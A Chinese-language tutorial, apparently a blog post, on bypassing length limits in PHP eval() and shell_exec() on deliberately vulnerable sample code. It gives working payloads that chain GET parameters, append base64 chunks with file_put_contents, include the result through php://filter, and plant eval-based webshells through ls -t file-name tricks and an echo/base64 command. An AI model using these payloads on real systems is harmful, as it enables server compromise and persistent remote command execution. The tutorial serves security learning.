Eval绕过限制参数限制

PHP Eval函数参数限制在16个字符

PHP代码

复制代码
 <?php
 $param = $_REQUEST['param'];  
 if (
     strlen($param) < 17 &&  stripos($param, 'eval') === false &&  stripos($param, 'assert') === false
 )
 {
     eval($param);
 }
 ?>
     
 # 部署环境属于ubuntu系统

通过GET传参绕过

由于是接收param参数,并且在最后面通过eval执行,所以我们可以控制参数执行一些简单的命令。比如phpinfo();

我们学习过eval是PHP的代码执行方法,并且在Linux系统中是可以通过反引号来执行命令的。所以我们是不是可以通过eval + 反引号 吧代码执行转变为命令执行呢?

我们发现可以这样做,通过echo来输出结果。但是此时如果想写一句话木马就不行了,因为PHP代码中有限制长度。

所以我们是不是可以通过命名一个符合要求的新参数,并且通过GET或者POST传递参数,让eval执行传递的新参数,然后我们通过给新参数定义不同的内容来执行命令,那么不就可以突破长度限制了吗?

由于本地权限不高,我们并不能执行删库跑路代码。

但是由于在本地存在创建文件的权限,所以我们是不是可以在本地写一句话木马文件呢?

文件是可以创建的,所以我们可以在本地写一句话木马文件。

当然除去使用echo打印输出,我们也可以通过exec($_GET[1]);来进行。

用这个方法就可以绕过Eval函数参数限制的情况,利用难度比较低 但是环境要求高。

通过file_put_contents函数写文件绕过

file_put_contents函数

file_put_contents --- 将数据写入文件

复制代码
 file_put_contents(
     string $filename,
     mixed $data,
     int $flags = 0,
     ?resource $context = null
 ): int|false

如果 filename 不存在,将会创建文件。反之,存在的文件将会重写,除非设置 FILE_APPEND flag。

参数 说明
filename 要被写入数据的文件名。
data 要写入的数据。类型可以是 string,array 或者是 stream 资源。
flags flags 的值
context 一个 context 资源。

FLAG内容

Flag 描述
FILE_USE_INCLUDE_PATH 在 include 目录里搜索 filename
FILE_APPEND 如果文件 filename 已经存在,追加数据而不是覆盖。
LOCK_EX 在写入时获取文件独占锁。换句话说,在调用 fopen() 和 fwrite()中间发生了 flock() 调用。这与调用带模式"x"的 fopen() 不同。

返回值 该函数将返回写入到文件内数据的字节数,失败时返回false。

通过file_put_contents函数我们可以写一个文件,然后一点点向文件里面添加内容,然后通过执行这个文件不就可以绕过长度的限制吗?

复制代码
 ?1=file_put_contents&param=$_GET[1](N,P,file_append);

此时我们发现,param的内容超过16个字符了。所以被过滤掉了没有生成文件。

我们通过查询官方文档,file_append参数确实是追加啊。也没其他的形式是追加啊。

此时要注意了,因为PHP的底层代码是C语言。所以我们可以去看底层C语言代码是如何写的,通过查看我们发现C语言中追加的参数可以使用" 8 "代替。此时就可以解决长度问题了。

但是还有一个问题,我们发现file_put_contents函数无法追加一些特殊字符。所以我们可以提前内容进行Base64编码传递。

复制代码
 ?1=file_put_contents&param=$_GET[1](N,P,8);  
 ​
 Base64编码内容:<?php eval($_POST[9]);
 Base64编码:PD9waHAgZXZhbCgkX1BPU1RbOV0pOw
 ​
 ?1=file_put_contents&param=$_GET[1](N,D,8);  
             ......
             
 # 执行文件
 ?param=include$_GET[1];&1=php://filter/read=convert.b  ase64-decode/resource=N
 ​
 读取文件的时候通过PHP的伪协议,通过Base64-decode将文件内容转成正常的一句话来读取内容。然后文件包含直接执行。因为文件包含会将一切内容都转为PHP文件进行执行。从而可以执行:"<?php eval($_POST[9]);"的内容

然后通过服务该文件,传递参数执行命令。

注意

如果遇到文件无法生成的问题,可能是权限不够。查看Nginx目录下html文件夹的所属用户以及所属组是否为www-data。如果不是需要通过chown目录修改文件的所属用户和所属组。

复制代码
 # 语法
 chown [-R] ownname:groupname filename
 # -R 表示递归该文件夹下所有内容都所有文件的所属用户和所属组
 ​
 chown -R www-data:www-data html

命令长度限制突破技巧

Linux命令长度限制在7个字符

PHP代码

复制代码
 <?php
 $param = $_REQUEST['param'];  
 if ( strlen($param) < 8 ) 
 {  
     echo shell_exec($param);
 }
 ?>

通过重定向写文件绕过

根据之前的经验,我们是不是可以通过一点一点写入问价写来绕过?显然是不可能的收到长度的限制,导致想法实现不了。Linux中可以通过重定向创建文件,并且可以定义文件的名称。如果我们是不是写一堆文件并且通过按照一定的顺序排序,从而将文件名写入到一个新的文件中,最后使用sh执行这个文件不就可以了?

  • ls -t 以创建时间来列出当前目录下所有文件

  • 文件列表以[换行符]分割每个文件

  • 引入 \ 转义ls时的换行

  • 换行不影响命令执行

  • 成功构造任意命令执行,写入Webshell

由于写入webshell中的PHP语句存在特殊字符,所以我们先将语句<?php eval($_GET[1]);通过base64进行编码PD9waHAgZXZhbCgkX0dFVFsxXSk7然后再一个一个慢慢的去上传。

最后通过echo追加文件到创建的c.php文件中以base64解码的形式。

复制代码
 echo PD9waHAgZXZhbCgkX0dFVFsxXSk7| base64 -d>  c.php
相关推荐
中草药z1 小时前
【Spring】深入解析 Spring 原理:Bean 的多方面剖析(源码阅读)
java·数据库·spring boot·spring·bean·源码阅读
地球资源数据云1 小时前
全国30米分辨率逐年植被覆盖度(FVC)数据集
大数据·运维·服务器·数据库·均值算法
Ahern_1 小时前
Oracle 普通表至分区表的分区交换
大数据·数据库·sql·oracle
夜半被帅醒2 小时前
MySQL 数据库优化详解【Java数据库调优】
java·数据库·mysql
不爱学习的啊Biao2 小时前
【13】MySQL如何选择合适的索引?
android·数据库·mysql
破 风2 小时前
SpringBoot 集成 MongoDB
数据库·mongodb
Rverdoser2 小时前
MySQL-MVCC(多版本并发控制)
数据库·mysql
m0_748233642 小时前
SQL数组常用函数记录(Map篇)
java·数据库·sql
Clockwiseee2 小时前
PHP伪协议总结
android·开发语言·php
dowhileprogramming3 小时前
Python 中的迭代器
linux·数据库·python